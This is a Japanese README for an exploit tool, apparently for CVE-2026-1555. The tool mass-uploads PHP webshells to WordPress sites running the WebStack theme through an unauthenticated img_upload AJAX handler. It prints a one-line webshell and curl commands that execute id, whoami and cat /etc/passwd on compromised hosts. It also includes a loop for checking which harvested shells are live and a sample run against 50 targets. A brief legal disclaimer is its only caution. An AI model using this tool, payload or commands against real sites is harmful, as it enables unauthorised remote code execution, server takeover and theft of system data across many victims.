
WebStack <= 1.2024 - 未認証の任意ファイルアップロード
WebStack <= 1.2024 - 認証なし任意ファイルアップロード
img_upload AJAX ハンドラを介した認証なしリモートコード実行
WordPress の admin-ajax.php アクションフック img_upload に登録されている io_img_upload() 関数は、アップロードされたファイルをサーバーに書き込む前に、ファイルタイプや拡張子の検証を一切行いません。このアクションは認証チェックなし(wp_ajax_nopriv_)で登録されているため、認証されていないリモートの攻撃者は PHP ウェブシェルを含む任意のファイルを POST でき、サーバーはそれを公開アクセス可能なパスに保存するため、直接的なリモートコード実行が可能になります。
脆弱なエンドポイント:
POST /wp-admin/admin-ajax.php
action=img_upload
files=@<payload>
uploaded_paths.txt に保存Python バージョン: 3.8+
依存関係をインストール:
pip install requests rich urllib3
list.txt(または任意の名前)というファイルを作成し、1 行に 1 ターゲットを記述します:
https://target1.com
https://target2.com
http://target3.com
http://またはhttps://が付いていないターゲットには、自動的にhttp://がプレフィックスとして付加されます。
ウェブシェルをスクリプトと同じディレクトリに配置します。例:
# Minimal PHP webshell
echo '<?php system($_GET["cmd"]); ?>' > shell.php
python CVE-2026-1555.py
以下の入力を求められます:
| プロンプト |
|---|
アップロードが成功するたびに以下が表示されます:
╭─ IMG_UPLOAD ──────────────────────────────────╮
│ Upload successful │
│ │
│ Target: https://target.com │
│ Shell URL: https://target.com/wp-content/... │
╰────────────────────────────────────────────────╯
成功したすべてのシェル URL が以下に追記されます:
uploaded_paths.txt
アップロード成功後、ブラウザまたは curl でシェルに直接アクセスできます:
# Browser
https://target.com/wp-content/uploads/shell.php?cmd=id
# curl
curl "https://target.com/wp-content/uploads/shell.php?cmd=whoami"
# Full command execution
curl "https://target.com/wp-content/uploads/shell.php?cmd=cat+/etc/passwd"
正確なアップロードパスはサーバーの JSON レスポンス(
data.src)から抽出され、自動的に表示されます。
出力ファイルからアップロード済みの全シェルをすばやく検証します:
while read url; do
echo -n "[*] $url -> "
curl -sk "$url?cmd=id" 2>/dev/null || echo "DEAD"
done < uploaded_paths.txt
各実行の終了時にサマリーが表示されます:
Summary 50/50 OK: 12 FAIL: 38
╭──────────────────────────────────────────╮
│ Shell URLs saved to uploaded_paths.txt │
╰──────────────────────────────────────────╯
CVE-2026-1555.py ← Main exploit script
list.txt ← Target URLs (one per line)
shell.php ← Payload to upload
uploaded_paths.txt ← Auto-generated: successful shell URLs
このツールは、正規の許可を得たペネトレーションテスト、セキュリティ研究、教育目的のみに提供されています。
作者である Nxploited は、このツールを使用して行われた不正使用、損害、または違法行為について一切の責任を負いません。このツールを使用することで、すべてのターゲットシステムをテストする明示的な書面による許可を得ていることを確認したことになります。
所有していない、またはテストする明示的な許可を得ていないシステムに対する不正使用は違法であり、該当するサイバー犯罪法に基づき刑事訴追される可能性があります。
責任を持って使用してください。あなた自身の行動に対して単独で責任を負います。
👤 作者: Nxploited 📣 チャンネル: Nxploited ZeroDay Hub 💬 Telegram: @KNxploited
| 項目 | 詳細 |
|---|
| CVE ID | CVE-2026-1555 |
| 影響を受けるコンポーネント | WebStack Theme for WordPress |
| 影響を受けるバージョン | 1.2024 までの全バージョン |
| 脆弱性の種類 | 任意ファイルアップロード → リモートコード実行 |
| 認証要件 | ❌ 不要(認証なし) |
| CVSS スコア | 9.8 CRITICAL |
| CVSS ベクター | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CNA | Wordfence |
| 説明 |
|---|
| デフォルト |
|---|
Targets file | ターゲットリストへのパス | list.txt |
Threads | 同時実行ワーカー数 | 6 |
Local file to upload | ペイロードのファイル名(スクリプトディレクトリ内) | shell.php |